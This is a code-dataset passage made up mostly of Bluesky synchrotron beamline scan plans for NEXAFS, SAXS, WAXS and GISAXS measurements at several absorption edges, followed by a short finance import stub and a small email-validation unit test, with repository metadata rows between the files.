name_fmt = '{sample}_{energy}eV_xbpm{xbpm}'
for e in energies:
yield from bps.mv(energy, e)
sample_name = name_fmt.format(sample=name, energy=e, xbpm = '%3.1f'%xbpm3.sumY.value)
sample_id(user_name='SR', sample_name=sample_name)
print(f'\n\t=== Sample: {sample_name} ===\n')
yield from bp.count(dets, num=1)
yield from bps.mv(energy, 7100)
#name_fmt = '{sample}_2430eV_postmeas_xbpm{xbpm}'
#sample_name = name_fmt.format(sample=name, xbpm = '%3.1f'%xbpm3.sumY.value)
#sample_id(user_name='GF', sample_name=sample_name)
#print(f'\n\t=== Sample: {sample_name} ===\n')
#yield from bp.count(dets, num=1)
def SAXS_Fe_edge(t=0.5):
dets = [pil1M]
names = ['Ca10_2_SAXS_sdd5_1s_redo_','Ca2_2_SAXS_sdd5_1s_redo_', 'Ca2_4_SAXS_sdd5_1s_redo_', 'PBS_2_SAXS_sdd5_1s_redo_']
names1 = ['Ca10_2_NEXAFS_wa0_redo_','Ca2_2_NEXAFS_wa0_redo_', 'Ca2_4_NEXAFS_wa0_redo_', 'PBS_2_NEXAFS_wa0_redo_']
xs = [-36600, -10600, 15400, 41100]
ys = [-1050, -1050, -1050, -1050]
energies = [7100, 7110, 7114, 7115, 7118, 7120, 7125, 7140]
for i, (name, name1, x, y) in enumerate(zip(names, names1, xs, ys)):
yield from bps.mv(piezo.x, x)
yield from bps.mv(piezo.y, y)
yield from NEXAFS_Fe_edge(t=1, name=name1)
dets = [pil1M]
det_exposure_time(t,t)
xsss = [x+400, x + 900, x + 1200]
for j, xss in enumerate(xsss):
yield from bps.mv(piezo.x, xss)
for e in energies:
name_fmt = '{sample}_pos{pos}_{energy}eV_xbpm{xbpm}'
yield from bps.mv(energy, e)
sample_name = name_fmt.format(sample=name, pos = '%2.2d'%j, energy=e, xbpm = '%3.1f'%xbpm3.sumY.value)
sample_id(user_name='SR', sample_name=sample_name)
print(f'\n\t=== Sample: {sample_name} ===\n')
yield from bp.count(dets, num=1)
yield from bps.mv(energy, 7100)
name_fmt = '{sample}_pos{pos}_7100eV_postmeas_xbpm{xbpm}'
sample_name = name_fmt.format(sample=name, pos = '%2.2d'%j, xbpm = '%3.1f'%xbpm3.sumY.value)
sample_id(user_name='GF', sample_name=sample_name)
print(f'\n\t=== Sample: {sample_name} ===\n')
yield from bp.count(dets, num=1)
def NEXAFS_Ag_edge(t=0.5):
dets = [pil300KW]
name = 'N2_redo_GINEXAFS_wa75_'
#x = [8800]
energies = np.linspace(3340, 3390, 51)
#for name, x in zip(names, x):
#bps.mv(piezo.x, x)
det_exposure_time(t,t)
name_fmt = '{sample}_{energy}eV_xbpm{xbpm}'
for e in energies:
yield from bps.mv(energy, e)
sample_name = name_fmt.format(sample=name, energy=e, xbpm = '%3.1f'%xbpm3.sumY.value)
sample_id(user_name='SR', sample_name=sample_name)
print(f'\n\t=== Sample: {sample_name} ===\n')
yield from bp.count(dets, num=1)
yield from bps.sleep(2)
yield from bps.mv(energy, 3340)
yield from bps.sleep(10)
def GISAXS_Ca_edge(t=0.5):
dets = [pil300KW]
names = ['O_9_gisaxs','O_8_gisaxs','O_7_gisaxs','O_6_gisaxs','O_5_gisaxs','O_4_gisaxs','O_3_gisaxs','O_2_gisaxs','O_1_gisaxs','Si_last_gisaxs']
xs = [-50000, -38500, -22500, -11500, 500, 15000, 27000, 41000, 50000, 31400]
zs = [700, 0, -800, 400, 1900, -2000, -1000, 300, -600, -800]
energies = [4030, 4050, 4055, 4075]
det_exposure_time(t,t)
name_fmt = '{sample}_{energy}eV_ai{ai}_xbpm{xbpm}_wa{wa}'
angles = [0.38, 0.4]
wax = [0, 6.5, 13]
th_0 = piezo.th.position
for x, z, name in zip(xs, zs, names):
yield from bps.mv(piezo.th, th_0)
yield from bps.mv(piezo.x, x)
yield from bps.mv(piezo.z, z)
yield from bps.mv(GV7.open_cmd, 1 )
yield from bps.sleep(5)
yield from bps.mv(GV7.open_cmd, 1 )
yield from alignement_gisaxs(0.3)
yield from bps.mv(att2_11, 'Insert')
yield from bps.mv(GV7.close_cmd, 1 )
yield from bps.sleep(5)
yield from bps.mv(att2_11, 'Insert')
yield from bps.mv(GV7.close_cmd, 1 )
th_0 = piezo.th.position
for wa in wax:
yield from bps.mv(waxs, wa)
for k, e in enumerate(energies):
yield from bps.mv(energy, e)
for alpha_i in angles:
yield from bps.mv(piezo.th, th_0 + alpha_i)
sample_name = name_fmt.format(sample=name, energy=e, ai='%3.2f'%alpha_i, xbpm = '%3.1f'%xbpm3.sumY.value, wa='%2.1f'%wa)
sample_id(user_name='SR', sample_name=sample_name)
print(f'\n\t=== Sample: {sample_name} ===\n')
yield from bp.count(dets, num=1)
yield from bps.mv(energy, 4050)
yield from bps.mv(energy, 4030)
def SAXS_Ca_edge_hyd(t=0.5):
dets = [pil1M]
name = 'hyd_cell_blank'
energies = [4030, 4050, 4055, 4075]
det_exposure_time(t,t)
name_fmt = '{sample}_{energy}eV_xbpm{xbpm}_sp{sp}'
x_pos = piezo.x.position
y_pos = piezo.y.position
for k, e in enumerate(energies):
yield from bps.mv(energy, e)
yield from bps.mv(piezo.x, x_pos + k*500)
for i in range(0, 5, 1):
yield from bps.mv(piezo.y, y_pos + i*200)
sample_name = name_fmt.format(sample=name, energy=e, sp='%2.2d'%i, xbpm = '%3.1f'%xbpm3.sumY.value)
sample_id(user_name='JDM', sample_name=sample_name)
print(f'\n\t=== Sample: {sample_name} ===\n')
yield from bp.count(dets, num=1)
yield from bps.mv(piezo.y, y_pos)
yield from bps.mv(energy, 4050)
yield from bps.mv(energy, 4030)
def SAXS_Ca_edge_hyd_onespot(t=0.5):
dets = [pil1M]
name = 'hyd_cell_blank_onespot2'
energies = [4030, 4040, 4050, 4055, 4075]
det_exposure_time(t,t)
name_fmt = '{sample}_{energy}eV_xbpm{xbpm}_sp{sp}'
y_pos = piezo.y.position
for k, e in enumerate(energies):
yield from bps.mv(energy, e)
for i in range(0, 5, 1):
yield from bps.mv(piezo.y, y_pos + i*200)
sample_name = name_fmt.format(sample=name, energy=e, sp='%2.2d'%i, xbpm = '%3.1f'%xbpm3.sumY.value)
sample_id(user_name='JDM', sample_name=sample_name)
print(f'\n\t=== Sample: {sample_name} ===\n')
yield from bp.count(dets, num=1)
yield from bps.mv(piezo.y, y_pos)
yield from bps.mv(energy, 4050)
yield from bps.mv(energy, 4030)
def SAXS_Ca_edge_dry1(t=1):
dets = [pil300KW, pil1M]
name = 'hyd_cell_blank2'
energies = [4030, 4040, 4050, 4055, 4075]
det_exposure_time(t,t)
name_fmt = '{sample}_{energy}eV_xbpm{xbpm}_wa{wa}'
wa = [0.0, 6.5, 13.0]
yield from bps.mv(GV7.close_cmd, 1 )
yield from bps.sleep(1)
yield from bps.mv(GV7.close_cmd, 1 )
for wax in wa:
yield from bps.mv(waxs, wax)
for k, e in enumerate(energies):
yield from bps.mv(energy, e)
sample_name = name_fmt.format(sample=name, energy=e, xbpm = '%3.1f'%xbpm3.sumY.value, wa='%2.1f'%wax)
sample_id(user_name='JDM', sample_name=sample_name)
print(f'\n\t=== Sample: {sample_name} ===\n')
yield from bp.count(dets, num=1)
yield from bps.mv(energy, 4050)
yield from bps.mv(energy, 4030)
for wax in wa[::-1]:
yield from bps.mv(waxs, wax)
name_fmt = '{sample}_4030eV_postmeas_xbpm{xbpm}_wa{wa}'
sample_name = name_fmt.format(sample=name, xbpm = '%3.1f'%xbpm3.sumY.value, wa='%2.1f'%wax)
sample_id(user_name='OS', sample_name=sample_name)
print(f'\n\t=== Sample: {sample_name} ===\n')
yield from bp.count(dets, num=1)
sample_id(user_name='test', sample_name='test')
def SAXS_Ca_edge_dry_special1(t=1):
dets = [pil300KW]
names = ['O5_chl_4']
x_s = [-44500]
y_s = [-1200]
energies = [4030, 4040, 4050, 4055, 4075]
det_exposure_time(t,t)
name_fmt = '{sample}_{energy}eV_pos{posi}_wa{wa}_xbpm{xbpm}'
wa = [0.0, 6.5, 13.0]
yield from bps.mv(GV7.close_cmd, 1 )
yield from bps.sleep(1)
yield from bps.mv(GV7.close_cmd, 1 )
for x, y, name in zip(x_s, y_s, names):
yield from bps.mv(piezo.x, x)
yield from bps.mv(piezo.y, y)
ys = np.linspace(y, y + 250, 5)
xs = np.linspace(x, x - 400, 3)
yss, xss = np.meshgrid(ys, xs)
yss = yss.ravel()
xss = xss.ravel()
for pos, (xsss, ysss) in enumerate(zip(xss, yss)):
yield from bps.mv(piezo.x, xsss)
yield from bps.mv(piezo.y, ysss)
name_new = name + 'pos%2.2d'%pos
yield from NEXAFS_Ca_edge_special(t=0.5, name=name_new)
for wax in wa:
yield from bps.mv(waxs, wax)
for k, e in enumerate(energies):
yield from bps.mv(energy, e)
for pos, (xsss, ysss) in enumerate(zip(xss, yss)):
yield from bps.mv(piezo.x, xsss)
yield from bps.mv(piezo.y, ysss)
sample_name = name_fmt.format(sample=name, energy=e, posi='%2.2d'%pos ,wa='%2.1f'%wax, xbpm = '%3.1f'%xbpm3.sumY.value)
sample_id(user_name='JDM', sample_name=sample_name)
print(f'\n\t=== Sample: {sample_name} ===\n')
yield from bp.count(dets, num=1)
yield from bps.mv(energy, 4050)
yield from bps.mv(energy, 4030)
for wax in wa[::-1]:
yield from bps.mv(waxs, wax)
for pos, (xsss, ysss) in enumerate(zip(xss, yss)):
yield from bps.mv(piezo.x, xsss)
yield from bps.mv(piezo.y, ysss)
name_fmt = '{sample}_postmeas_4030eV_pos{posi}_wa{wa}_xbpm{xbpm}'
sample_name = name_fmt.format(sample=name, posi='%2.2d'%pos, wa='%2.1f'%wax, xbpm = '%3.1f'%xbpm3.sumY.value)
sample_id(user_name='JDM', sample_name=sample_name)
print(f'\n\t=== Sample: {sample_name} ===\n')
yield from bp.count(dets, num=1)
sample_id(user_name='test', sample_name='test')
def SAXS_Ca_edge_dry_special2(t=1):
dets = [pil300KW, pil1M]
names = ['O5_ut_2','O5_ut_3','O5_ut_4', 'O5_ca_1', 'O5_ca_2', 'O5_ca_3', 'O5_chl_1', 'O5_chl_2', 'O5_chl_3']
x_s = [31500, 25000, 18000, 5400, 100, -5400, -22600, -30600, -38600]
y_s = [-2200, -1400, -2000, -2000, -2000, -2000, -800, -2000, -2000]
energies = [4030, 4040, 4050, 4055, 4075]
det_exposure_time(t,t)
name_fmt = '{sample}_{energy}eV_pos{posi}_wa{wa}_xbpm{xbpm}'
wa = [0.0, 6.5, 13.0]
yield from bps.mv(GV7.open_cmd, 1 )
yield from bps.sleep(1)
yield from bps.mv(GV7.open_cmd, 1 )
for x, y, name in zip(x_s, y_s, names):
yield from bps.mv(piezo.x, x)
yield from bps.mv(piezo.y, y)
ys = np.linspace(y, y + 500, 2)
xs = np.linspace(x, x - 500, 2)
yss, xss = np.meshgrid(ys, xs)
yss = yss.ravel()
xss = xss.ravel()
yield from NEXAFS_Ca_edge_special(t=0.5, name=name)
for wax in wa:
yield from bps.mv(waxs, wax)
for k, e in enumerate(energies):
yield from bps.mv(energy, e)
for pos, (xsss, ysss) in enumerate(zip(xss, yss)):
yield from bps.mv(piezo.x, xsss)
yield from bps.mv(piezo.y, ysss)
sample_name = name_fmt.format(sample=name, energy=e, posi='%1.1d'%pos ,wa='%2.1f'%wax, xbpm = '%3.1f'%xbpm3.sumY.value)
sample_id(user_name='JDM', sample_name=sample_name)
print(f'\n\t=== Sample: {sample_name} ===\n')
yield from bp.count(dets, num=1)
yield from bps.mv(energy, 4050)
yield from bps.mv(energy, 4030)
wa = [0.0, 6.5, 13.0]
for wax in wa[::-1]:
yield from bps.mv(waxs, wax)
for pos, (xsss, ysss) in enumerate(zip(xss, yss)):
yield from bps.mv(piezo.x, xsss)
yield from bps.mv(piezo.y, ysss)
name_fmt = '{sample}_postmeas_4030eV_pos{posi}_wa{wa}_xbpm{xbpm}'
sample_name = name_fmt.format(sample=name, posi='%2.2d'%pos, wa='%2.1f'%wax, xbpm = '%3.1f'%xbpm3.sumY.value)
sample_id(user_name='JDM', sample_name=sample_name)
print(f'\n\t=== Sample: {sample_name} ===\n')
yield from bp.count(dets, num=1)
sample_id(user_name='test', sample_name='test')
def NEXAFS_Ca_edge_special(t=0.5, name='test'):
yield from bps.mv(waxs, 60)
dets = [pil300KW]
energies = np.linspace(4030, 4100, 71)
det_exposure_time(t,t)
name_fmt = 'nexafs_{sample}_{energy}eV_xbpm{xbpm}'
for e in energies:
yield from bps.mv(energy, e)
sample_name = name_fmt.format(sample=name, energy=e, xbpm = '%3.1f'%xbpm3.sumY.value)
sample_id(user_name='JDM', sample_name=sample_name)
print(f'\n\t=== Sample: {sample_name} ===\n')
yield from bp.count(dets, num=1)
yield from bps.mv(energy, 4075)
yield from bps.sleep(2)
yield from bps.mv(energy, 4050)
yield from bps.sleep(2)
yield from bps.mv(energy, 4030)
sample_id(user_name='test', sample_name='test')
def night_shift_run(t=1):
yield from SAXS_Ca_edge_dry_special1(t=0.5)
yield from bps.sleep(10)
yield from SAXS_Ca_edge_dry_special2(t=0.5)
def run_saxs_nexafs(t=1):
yield from nexafs_prep_multisample(t=0.5)
yield from bps.sleep(10)
yield from saxs_prep_multisample(t=0.5)
def nexafs_prep_multisample(t=1):
names = ['NEXAFS_WT_CH24_1_spot3','NEXAFS_WT_CH24_2_spot3','NEXAFS_WT_CH24_3_spot3', 'NEXAFS_xxt1xxt2_CH24_Ca_1_spot1']
x_s = [27400, 20800, 14700, -13250]
y_s = [300, 300, 200, -1300]
for x, y, name in zip(x_s, y_s, names):
yield from bps.mv(piezo.x, x)
yield from bps.mv(piezo.y, y)
yield from NEXAFS_Ca_edge_multi(t=0.5, name=name)
sample_id(user_name='test', sample_name='test')
def saxs_prep_multisample(t=1):
dets = [pil300KW, pil1M]
names = ['xxt1xxt2_CH24_Ca_1_spot1', 'xxt1xxt2_CH24_Ca_1_spot2', 'xxt1xxt2_CH24_Ca_1_spot3', 'xxt1xxt2_CH24_Ca_3_spot3', 'xxt1xxt2_CH24_Ca_3_spot2', 'xxt1xxt2_CH24_Ca_3_spot1']
x_s = [-13250, -13250, -13250, -27550, -27250, -27490]
y_s = [-1400, -800, 100, 300, -800, -1600]
energies = [4030, 4040, 4050, 4055, 4075]
det_exposure_time(t,t)
name_fmt = '{sample}_{energy}eV_pos{posi}_wa{wa}_xbpm{xbpm}'
wa = [0, 6.5, 13.0] #19.5
for x, y, name in zip(x_s, y_s, names):
yield from bps.mv(piezo.x, x)
yield from bps.mv(piezo.y, y)
for wax in wa:
yield from bps.mv(waxs, wax)
for k, e in enumerate(energies):
yield from bps.mv(energy, e)
name_fmt = '{sample}_{energy}eV_xbpm{xbpm}_wa{wa}'
sample_name = name_fmt.format(sample=name, energy=e, xbpm = '%3.1f'%xbpm3.sumY.value, wa='%2.1f'%wax)
sample_id(user_name='OS', sample_name=sample_name)
print(f'\n\t=== Sample: {sample_name} ===\n')
yield from bp.count(dets, num=1)
yield from bps.mv(energy, 4050)
yield from bps.mv(energy, 4030)
for wax in wa[::-1]:
yield from bps.mv(waxs, wax)
name_fmt = '{sample}_4030eV_postmeas_xbpm{xbpm}_wa{wa}'
sample_name = name_fmt.format(sample=name, xbpm = '%3.1f'%xbpm3.sumY.value, wa='%2.1f'%wax)
sample_id(user_name='OS', sample_name=sample_name)
print(f'\n\t=== Sample: {sample_name} ===\n')
yield from bp.count(dets, num=1)
sample_id(user_name='test', sample_name='test')
def NEXAFS_Ca_edge_multi(t=0.5, name='test'):
yield from bps.mv(waxs, 60)
dets = [pil300KW]
energies = np.linspace(4030, 4150, 121)
det_exposure_time(t,t)
name_fmt = '{sample}_{energy}eV_xbpm{xbpm}'
for e in energies:
yield from bps.mv(energy, e)
sample_name = name_fmt.format(sample=name, energy=e, xbpm = '%3.1f'%xbpm3.sumY.value)
sample_id(user_name='OS', sample_name=sample_name)
print(f'\n\t=== Sample: {sample_name} ===\n')
yield from bp.count(dets, num=1)
yield from bps.mv(energy, 4125)
yield from bps.mv(energy, 4100)
yield from bps.mv(energy, 4075)
yield from bps.mv(energy, 4050)
yield from bps.mv(energy, 4030)
sample_id(user_name='test', sample_name='test')
def NEXAFS_Ca_edge(t=0.5,):
yield from bps.mv(waxs, 60)
dets = [pil300KW]
name = 'hyd_cell_blank_sp2'
#x = [8800]
energies = np.linspace(4030, 4150, 121)
#for name, x in zip(names, x):
#bps.mv(piezo.x, x)
det_exposure_time(t,t)
name_fmt = '{sample}_{energy}eV_xbpm{xbpm}'
for e in energies:
yield from bps.mv(energy, e)
sample_name = name_fmt.format(sample=name, energy=e, xbpm = '%3.1f'%xbpm3.sumY.value)
sample_id(user_name='JDM', sample_name=sample_name)
print(f'\n\t=== Sample: {sample_name} ===\n')
yield from bp.count(dets, num=1)
yield from bps.mv(energy, 4125)
yield from bps.mv(energy, 4100)
yield from bps.mv(energy, 4075)
yield from bps.mv(energy, 4050)
yield from bps.mv(energy, 4030)
name_fmt = '{sample}_4030.0eV_postmeas'
sample_name = name_fmt.format(sample=name)
sample_id(user_name='OS', sample_name=sample_name)
print(f'\n\t=== Sample: {sample_name} ===\n')
yield from bp.count(dets, num=1)
sample_id(user_name='test', sample_name='test')
def NEXAFS_P_edge(t=0.5):
yield from bps.mv(waxs, 30)
dets = [pil300KW]
name = 'NEXAFS_PBS1_Pedge_nspot1'
energies = np.linspace(2140, 2180, 41)
energies_back = np.linspace(2180, 2140, 41)
det_exposure_time(t,t)
name_fmt = '{sample}_{energy}eV_xbpm{xbpm}'
for e in energies:
yield from bps.mv(energy, e)
sample_name = name_fmt.format(sample=name, energy=e, xbpm = '%3.1f'%xbpm3.sumY.value)
sample_id(user_name='SR', sample_name=sample_name)
print(f'\n\t=== Sample: {sample_name} ===\n')
yield from bp.count(dets, num=1)
for e in energies_back:
yield from bps.mv(energy, e)
yield from bps.sleep(2)
def NEXAFS_S_edge(t=0.5):
yield from bps.mv(waxs, 30)
dets = [pil300KW]
name = 'NEXAFS_A12_Sedge'
energies = np.linspace(2430, 2500, 71)
energies_back = np.linspace(2500, 2430, 36)
det_exposure_time(t,t)
name_fmt = '{sample}_{energy}eV_xbpm{xbpm}'
for e in energies:
yield from bps.mv(energy, e)
sample_name = name_fmt.format(sample=name, energy=e, xbpm = '%3.1f'%xbpm3.sumY.value)
sample_id(user_name='SR', sample_name=sample_name)
print(f'\n\t=== Sample: {sample_name} ===\n')
yield from bp.count(dets, num=1)
for e in energies_back:
yield from bps.mv(energy, e)
def waxs_S_edge(t=1):
dets = [pil300KW]
names = ['A41']
x = [-28200]
y = [1600]
names1 = ['P3HT']
x1 = [-38700]
y1 = [900]
energies = np.linspace(2456, 2500, 23)
Ys = np.linspace(900, 2200, 23)
waxs_arc = [0, 19.5, 4]
for name, xs, ys in zip(names, x, y):
yield from bps.mv(piezo.x, xs)
yield from bps.mv(piezo.y, ys)
det_exposure_time(t,t)
name_fmt = '{sample}_{energy}eV'
for e in energies:
yield from bps.mv(energy, e)
sample_name = name_fmt.format(sample=name, energy=e)
sample_id(user_name='SR', sample_name=sample_name)
print(f'\n\t=== Sample: {sample_name} ===\n')
yield from bp.scan(dets, waxs, *waxs_arc)
yield from bps.mv(energy, 2490)
yield from bps.mv(energy, 2480)
yield from bps.mv(energy, 2470)
yield from bps.mv(energy, 2460)
yield from bps.mv(energy, 2456)
name_fmt = '{sample}_2456eV_postmeas'
sample_name = name_fmt.format(sample=name)
sample_id(user_name='SR', sample_name=sample_name)
print(f'\n\t=== Sample: {sample_name} ===\n')
yield from bp.scan(dets, waxs, *waxs_arc)
def waxs_S_edge(t=1):
dets = [pil300KW]
names1 = ['P3HT']
x1 = [-38700]
y1 = [900]
energies = [2460, 2465, 2470, 2474, 2475, 2476, 2478, 2480]
Ys = np.linspace(900, 2200, 8)
waxs_arc = [0, 39, 7]
for name, xs, ys in zip(names1, x1, y1):
yield from bps.mv(piezo.x, xs)
yield from bps.mv(piezo.y, ys)
det_exposure_time(t,t)
name_fmt = '{sample}_{energy}eV'
for e, ys in zip(energies, Ys):
yield from bps.mv(energy, e)
yield from bps.mv(piezo.y, ys)
sample_name = name_fmt.format(sample=name, energy=e)
sample_id(user_name='GF', sample_name=sample_name)
print(f'\n\t=== Sample: {sample_name} ===\n')
yield from bp.scan(dets, waxs, *waxs_arc)
yield from bps.mv(energy, 2470)
yield from bps.mv(energy, 2460)
name_fmt = '{sample}_2460eV_postmeas'
sample_name = name_fmt.format(sample=name)
sample_id(user_name='SR', sample_name=sample_name)
print(f'\n\t=== Sample: {sample_name} ===\n')
yield from bp.scan(dets, waxs, *waxs_arc)
def gomez_S_edge_new(t=1):
dets = [pil300KW]
energies = np.arange(2445, 2470, 5).tolist() + np.arange(2470, 2480, 0.25).tolist() + np.arange(2480, 2490, 1).tolist()+ np.arange(2490, 2501, 5).tolist()
waxs_arc = np.linspace(0, 19.5, 4)
yield from bps.mv(stage.th, 0)
yield from bps.mv(stage.y, 0)
names = ['P-1','P-2','Y-1','Y-2','Y-3','A5-1','A05-2','A0-1','A0-2','A2-1','A2-2','A05-1','A5-2','5','2-1','2-2','05']
x = [43400,38100,32300,26850,21700,16200,11000, 5600, 400, -4900,-10300,-15600,-21100,-26300,-31400,-36500,-42100]
y = [-3850,-3950,-3800,-400, -4100,-4150,-4150,-4150,-4100,-4100, -4050, -4200, -3750, -3800, -3700, -3650, -3800]
for name, xs, ys in zip(names, x, y):
yield from bps.mv(piezo.x, xs)
yield from bps.mv(piezo.y, ys)
yss = np.linspace(ys, ys + 700, 29)
xss = np.array([xs, xs + 300])
yss, xss = np.meshgrid(yss, xss)
yss = yss.ravel()
xss = xss.ravel()
for wa in waxs_arc:
yield from bps.mv(waxs, wa)
det_exposure_time(t,t)
name_fmt = '{sample}_{energy}eV_wa{wax}_bpm{xbpm}'
for e, xsss, ysss in zip(energies, xss, yss):
yield from bps.mv(energy, e)
yield from bps.sleep(1)
yield from bps.mv(piezo.y, ysss)
yield from bps.mv(piezo.x, xsss)
bpm = xbpm2.sumX.value
sample_name = name_fmt.format(sample=name, energy='%6.2f'%e, wax = wa, xbpm = '%4.3f'%bpm)
sample_id(user_name='GF', sample_name=sample_name)
print(f'\n\t=== Sample: {sample_name} ===\n')
yield from bp.count(dets, num=1)
yield from bps.mv(energy, 2470)
yield from bps.mv(energy, 2450)
yield from bps.mv(stage.th, 1)
yield from bps.mv(stage.y, -8)
names = ['10','CN','CN-2','CB','CB-2','DIO','AA-1','AA-2','AA-3']
x = [44300,39200,33800,28500,23200,18100,11700, 6300, 900]
y = [-8700,-8700,-8550,-8400,-8400,-7800,-8600,-8500,-8400]
for name, xs, ys in zip(names, x, y):
yield from bps.mv(piezo.x, xs)
yield from bps.mv(piezo.y, ys)
yss = np.linspace(ys, ys + 700, 29)
xss = np.array([xs, xs + 300])
yss, xss = np.meshgrid(yss, xss)
yss = yss.ravel()
xss = xss.ravel()
for wa in waxs_arc:
yield from bps.mv(waxs, wa)
det_exposure_time(t,t)
name_fmt = '{sample}_{energy}eV_wa{wax}_bpm{xbpm}'
for e, xsss, ysss in zip(energies, xss, yss):
yield from bps.mv(energy, e)
yield from bps.sleep(1)
yield from bps.mv(piezo.y, ysss)
yield from bps.mv(piezo.x, xsss)
bpm = xbpm2.sumX.value
sample_name = name_fmt.format(sample=name, energy='%6.2f'%e, wax = wa, xbpm = '%4.3f'%bpm)
sample_id(user_name='GF', sample_name=sample_name)
print(f'\n\t=== Sample: {sample_name} ===\n')
yield from bp.count(dets, num=1)
yield from bps.mv(energy, 2470)
yield from bps.mv(energy, 2450)
def nexafs_gomez_S_edge_new(t=1):
dets = [pil300KW]
energies = np.arange(2445, 2470, 5).tolist() + np.arange(2470, 2480, 0.25).tolist() + np.arange(2480, 2490, 1).tolist()+ np.arange(2490, 2501, 5).tolist()
waxs_arc = [52.5]
yield from bps.mv(stage.th, 0)
yield from bps.mv(stage.y, 0)
names = ['A05-1','A5-2','5','2-1','2-2','05']
x = [-15600,-21100,-26300,-31400,-36500,-42100]
y = [ -4200, -3750, -3800, -3700, -3650, -3800]
for name, xs, ys in zip(names, x, y):
yield from bps.mv(piezo.x, xs)
yield from bps.mv(piezo.y, ys)
for wa in waxs_arc:
yield from bps.mv(waxs, wa)
det_exposure_time(t,t)
name_fmt = 'nexafs_{sample}_{energy}eV_wa{wax}_bpm{xbpm}'
for e in energies:
yield from bps.mv(energy, e)
yield from bps.sleep(1)
bpm = xbpm2.sumX.value
sample_name = name_fmt.format(sample=name, energy='%6.2f'%e, wax = wa, xbpm = '%4.3f'%bpm)
sample_id(user_name='GF', sample_name=sample_name)
print(f'\n\t=== Sample: {sample_name} ===\n')
yield from bp.count(dets, num=1)
yield from bps.mv(energy, 2470)
yield from bps.mv(energy, 2450)
yield from bps.mv(stage.th, 1)
yield from bps.mv(stage.y, -8)
names = ['10','CN','CN-2','CB','CB-2','DIO','AA-1','AA-2','AA-3']
x = [44300,39200,33800,28500,23200,18100,11700, 6300, 900]
y = [-8700,-8700,-8550,-8400,-8400,-7800,-8600,-8500,-8400]
for name, xs, ys in zip(names, x, y):
yield from bps.mv(piezo.x, xs)
yield from bps.mv(piezo.y, ys)
for wa in waxs_arc:
yield from bps.mv(waxs, wa)
det_exposure_time(t,t)
name_fmt = 'nexafs_{sample}_{energy}eV_wa{wax}_bpm{xbpm}'
for e in energies:
yield from bps.mv(energy, e)
yield from bps.sleep(1)
bpm = xbpm2.sumX.value
sample_name = name_fmt.format(sample=name, energy='%6.2f'%e, wax = wa, xbpm = '%4.3f'%bpm)
sample_id(user_name='GF', sample_name=sample_name)
print(f'\n\t=== Sample: {sample_name} ===\n')
yield from bp.count(dets, num=1)
yield from bps.mv(energy, 2470)
yield from bps.mv(energy, 2450)
def trans_sulf(en1, en2, step):
eners = np.linspace(en1, en2, step)
for e in eners:
yield from bps.mv(energy, e)
yield from bps.sleep(10)
| 36.830275
| 180
| 0.548138
| 4,802
| 32,116
| 3.498959
| 0.09621
| 0.114629
| 0.124271
| 0.130818
| 0.833532
| 0.801274
| 0.782823
| 0.771694
| 0.76104
| 0.748304
| 0
| 0.123634
| 0.301874
| 32,116
| 871
| 181
| 36.87256
| 0.625753
| 0.05723
| 0
| 0.765599
| 0
| 0.001686
| 0.122404
| 0.051349
| 0
| 0
| 0
| 0
| 0.003373
| 1
| 0.040472
| false
| 0
| 0
| 0
| 0.040472
| 0.048904
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
41e7c7269fea1a866d303c501049e80b34c0c9e7
| 40
|
py
|
Python
|
src/finance_stats/equity_curve/__init__.py
|
pralphv/hkportfolioanalysis-backend
|
6dbf6f17e6ebd95e28ee042126b34408dde4f520
|
[
"MIT"
] | null | null | null |
src/finance_stats/equity_curve/__init__.py
|
pralphv/hkportfolioanalysis-backend
|
6dbf6f17e6ebd95e28ee042126b34408dde4f520
|
[
"MIT"
] | 1
|
2021-03-31T19:44:25.000Z
|
2021-03-31T19:44:25.000Z
|
src/finance_stats/equity_curve/__init__.py
|
pralphv/hkportfolioanalysis-backend
|
6dbf6f17e6ebd95e28ee042126b34408dde4f520
|
[
"MIT"
] | 1
|
2020-11-27T17:56:38.000Z
|
2020-11-27T17:56:38.000Z
|
from .api import generate_equity_curves
| 20
| 39
| 0.875
| 6
| 40
| 5.5
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.1
| 40
| 1
| 40
| 40
| 0.916667
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
510ed061f0427e3992d0e0ee82aaab9c8dc2fab5
| 183
|
py
|
Python
|
test_illegal.py
|
gregdetre/unit-testing-pres
|
c28cd3a938436b18f2175bfb43d0c33820dfc7ee
|
[
"MIT"
] | null | null | null |
test_illegal.py
|
gregdetre/unit-testing-pres
|
c28cd3a938436b18f2175bfb43d0c33820dfc7ee
|
[
"MIT"
] | null | null | null |
test_illegal.py
|
gregdetre/unit-testing-pres
|
c28cd3a938436b18f2175bfb43d0c33820dfc7ee
|
[
"MIT"
] | null | null | null |
from isitanemail import isitanemail
# USAGE:
# $ nose2 test_illegal
# $ nose2 test_illegal.test_illegal_no_tld
def test_illegal_no_tld():
assert not isitanemail('ab@cd')
| 15.25
| 42
| 0.743169
| 25
| 183
| 5.12
| 0.56
| 0.34375
| 0.25
| 0.25
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.013245
| 0.174863
| 183
| 11
| 43
| 16.636364
| 0.834437
| 0.371585
| 0
| 0
| 0
| 0
| 0.045455
| 0
| 0
| 0
| 0
| 0
| 0.333333
| 1
| 0.333333
| true
| 0
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
515e007899096be25e51248dd4ca92486a14e13b
| 2,920
|
py
|
Python
|
tests/test_ntiles.py
